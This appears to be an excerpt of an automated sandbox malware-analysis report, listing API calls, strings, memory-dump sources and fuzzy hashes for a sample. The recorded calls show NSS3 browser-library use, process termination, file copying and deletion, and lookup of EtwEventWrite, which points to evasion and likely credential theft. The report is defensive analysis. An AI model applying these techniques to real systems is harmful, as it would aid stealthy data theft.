                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CA56D36
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • database corruption, xrefs: 6CA56D2A
                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA56D20
                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CA56D2F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 632333372-598938438
                                                                                                                                                                                                              • Opcode ID: 0d38ad3f41c61603381cd896b1dde9f33d2882a8bdd934e9f7c29feb7c76a2e5
                                                                                                                                                                                                              • Instruction ID: 8a1757f7682b9a36b344a3366fb491ead5c18fbf79c4c02282fdb584d5d00809
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d38ad3f41c61603381cd896b1dde9f33d2882a8bdd934e9f7c29feb7c76a2e5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4212132600B049BC710CE1AC941B5AB7F2AF80318F68C92CD8599BF51E371F9D9C7A2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CB8CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CB8CC7B), ref: 6CB8CD7A
                                                                                                                                                                                                                • Part of subcall function 6CB8CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB8CD8E
                                                                                                                                                                                                                • Part of subcall function 6CB8CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB8CDA5
                                                                                                                                                                                                                • Part of subcall function 6CB8CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB8CDB8
                                                                                                                                                                                                              • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CB8CCB5
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(6CC214F4,6CC202AC,00000090), ref: 6CB8CCD3
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(6CC21588,6CC202AC,00000090), ref: 6CB8CD2B
                                                                                                                                                                                                                • Part of subcall function 6CAA9AC0: socket.WSOCK32(?,00000017,6CAA99BE), ref: 6CAA9AE6
                                                                                                                                                                                                                • Part of subcall function 6CAA9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CAA99BE), ref: 6CAA9AFC
                                                                                                                                                                                                                • Part of subcall function 6CAB0590: closesocket.WSOCK32(6CAA9A8F,?,?,6CAA9A8F,00000000), ref: 6CAB0597
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                              • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                              • API String ID: 1231378898-412307543
                                                                                                                                                                                                              • Opcode ID: 2ab97d0166f0efac98bee01e7fb215b2f91442e0f6f34ae5549081522d0b7cb2
                                                                                                                                                                                                              • Instruction ID: 0e2e53393ff310c8cf29187602cb627f9c182180891044d2da855cc98de8ce93
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ab97d0166f0efac98bee01e7fb215b2f91442e0f6f34ae5549081522d0b7cb2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B1181F5B202C05EDB409F6D9C067563AB8A356218F11117AE40A8BB41E77EEC444BD2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0092F257
                                                                                                                                                                                                                • Part of subcall function 0094ED88: std::exception::exception.LIBCMT ref: 0094ED9D
                                                                                                                                                                                                                • Part of subcall function 0094ED88: __CxxThrowException@8.LIBCMT ref: 0094EDB2
                                                                                                                                                                                                                • Part of subcall function 0094ED88: std::exception::exception.LIBCMT ref: 0094EDC3
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0092F262
                                                                                                                                                                                                                • Part of subcall function 0094EDD5: std::exception::exception.LIBCMT ref: 0094EDEA
                                                                                                                                                                                                                • Part of subcall function 0094EDD5: __CxxThrowException@8.LIBCMT ref: 0094EDFF
                                                                                                                                                                                                                • Part of subcall function 0094EDD5: std::exception::exception.LIBCMT ref: 0094EE10
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                              • API String ID: 1823113695-4289949731
                                                                                                                                                                                                              • Opcode ID: 86aaf790a29250f28e7674fb0a0add4977387d05168308c37d7f8957f094c278
                                                                                                                                                                                                              • Instruction ID: f884804a0ce5292174eb89d28b82dec6820ed980e356af37f9b149cbc3694a11
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86aaf790a29250f28e7674fb0a0add4977387d05168308c37d7f8957f094c278
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BD012A5D1020CB7CB04E7A9D816ECEBBF9AF84714F20027AAA15D3681EA705A014655
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009322D6,?), ref: 00931D41
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00931D48
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00931D59
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                                              • String ID: %hs
                                                                                                                                                                                                              • API String ID: 659108358-2783943728
                                                                                                                                                                                                              • Opcode ID: dc90fdbe5febcc99edc094bba105725911959f2e776b7b5b8bb148aa6b8943a4
                                                                                                                                                                                                              • Instruction ID: c87c2295d91d60b7caf2ec1840a0aca7089c540083d92776a10458a402682fa2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc90fdbe5febcc99edc094bba105725911959f2e776b7b5b8bb148aa6b8943a4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACD0A73174431477C6101BE6AC0DFA93F1CDB817A7F000020FE0DD61D0C965441497D5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00921402
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0092140D
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00921416
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsCreateDeviceRelease
                                                                                                                                                                                                              • String ID: DISPLAY
                                                                                                                                                                                                              • API String ID: 1843228801-865373369
                                                                                                                                                                                                              • Opcode ID: 8972dd90082569306de0aaa9fe7340dae447ee769de69c4d35af4794a2d73844
                                                                                                                                                                                                              • Instruction ID: 07dbf5c6a189ce464c174a3a1d40500c665c45dbb1cce79af262efc316466f72
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8972dd90082569306de0aaa9fe7340dae447ee769de69c4d35af4794a2d73844
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62D012313D830477F1701766BC0EF1A2924E7C7F03F200004F705580D046B01002E736
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 009218BA
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EtwEventWrite), ref: 009218CB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                                                                                              • String ID: EtwEventWrite$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1646373207-1851843765
                                                                                                                                                                                                              • Opcode ID: 73904dea399577527728db8cadefdc4cbab804246f4e96fa651afd022c9eabc1
                                                                                                                                                                                                              • Instruction ID: b5e9dc1700d03b1614d303697f514e37838ab3cca82baeccac45e094d3c421c2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73904dea399577527728db8cadefdc4cbab804246f4e96fa651afd022c9eabc1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6B092607543019B8F409B77AF8EA4A36A96AE0B4B3800580BA8AC2094D7A88018F716
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092B09B
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092B251
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092B26C
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0092B2BE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                                                              • Opcode ID: 6a3e628394f030312965929d00fc2eb0f23ec270d363f0574f2a48e2611456b5
                                                                                                                                                                                                              • Instruction ID: f247b0424dba2b10f9b888e4fa456338024f9fa0313d9f9a8eb9b580a4505901
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a3e628394f030312965929d00fc2eb0f23ec270d363f0574f2a48e2611456b5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D811936900129ABCF05FBA5EE47ADDB774AF84301F614121F944B716ADF70AE868F90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6CB31D8F
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: TlsGetValue.KERNEL32 ref: 6CB214E0
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: EnterCriticalSection.KERNEL32 ref: 6CB214F5
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: PR_Unlock.NSS3 ref: 6CB2150D
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CB31DA6
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CB31E13
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB31ED0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 84796498-0
                                                                                                                                                                                                              • Opcode ID: 1e7f52ea7d78a16b8e491273c1244607f16ed2a89cbecf30e2d92ba0e2c1cc86
                                                                                                                                                                                                              • Instruction ID: be944221f862f9f20fd369ba223fd7efd123afce222f9830bb37c77258d6bbc0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e7f52ea7d78a16b8e491273c1244607f16ed2a89cbecf30e2d92ba0e2c1cc86
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05515B75A00269CFDB00CF94C884BAEB7B9FF49308F185129D81D9B790D732E945CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB97E10
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB97EA6
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB97EB5
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CB97ED8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _byteswap_ulong
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4101233201-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CAC6C8D
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CAC6CA9
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CAC6CC0
                                                                                                                                                                                                              • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CBE8FE0), ref: 6CAC6CFE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2370200771-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,762283C0,00000000,?,?,?,?,?,?,0093C720,?,009370B3,?), ref: 0093C1AA
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0093C720,?,009370B3), ref: 0093C1DA
                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0093C720,?,009370B3,?), ref: 0093C206
                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0093C720,?,009370B3,?), ref: 0093C214
                                                                                                                                                                                                                • Part of subcall function 0093BB22: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,00E324F0), ref: 0093BB56
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3986731826-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT ref: 0093BF56
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 0093BF6A
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 0093BFB7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,67184B81,?,00000000,00E324F0,?,00000001,00E324F0,?,0093AFFC,?,00000001,00E324F0,67184B81,?), ref: 0093BFD6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memmove$FileWritemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 803809635-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009322AC
                                                                                                                                                                                                                • Part of subcall function 00931D36: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009322D6,?), ref: 00931D41
                                                                                                                                                                                                                • Part of subcall function 00931D36: HeapAlloc.KERNEL32(00000000), ref: 00931D48
                                                                                                                                                                                                                • Part of subcall function 00931D36: wsprintfW.USER32 ref: 00931D59
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 00932352
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00932360
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00932367
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_MillisecondsToInterval.NSS3(?), ref: 6CB36E36
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB36E57
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • PR_MillisecondsToInterval.NSS3(?), ref: 6CB36E7D
                                                                                                                                                                                                              • PR_MillisecondsToInterval.NSS3(?), ref: 6CB36EAA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6CB1DDB1,?,00000000), ref: 6CB1DDF4
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: TlsGetValue.KERNEL32 ref: 6CB214E0
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: EnterCriticalSection.KERNEL32 ref: 6CB214F5
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: PR_Unlock.NSS3 ref: 6CB2150D
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6CB1DDB1,?,00000000), ref: 6CB1DE0B
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6CB1DDB1,?,00000000), ref: 6CB1DE17
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: malloc.MOZGLUE(6CB18D2D,?,00000000,?), ref: 6CB20BF8
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: TlsGetValue.KERNEL32(6CB18D2D,?,00000000,?), ref: 6CB20C15
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE009,00000000), ref: 6CB1DE80
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6CAC4C64,?,-00000004), ref: 6CAC1EE2
                                                                                                                                                                                                                • Part of subcall function 6CB21820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6CAC1D97,?,?), ref: 6CB21836
                                                                                                                                                                                                              • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6CAC4C64,?,-00000004), ref: 6CAC1F13
                                                                                                                                                                                                              • DER_DecodeTimeChoice_Util.NSS3(?,6CAC4CA0,?,?,?,?,?,?,00000000,00000000,?,6CAC4C64,?,-00000004), ref: 6CAC1F37
                                                                                                                                                                                                              • DER_DecodeTimeChoice_Util.NSS3(?,6CAC4C1C,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAC4C64,?,-00000004), ref: 6CAC1F53
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: TimeUtil$Choice_Decode$GeneralizedTime_
                                                                                                                                                                                                              APIs
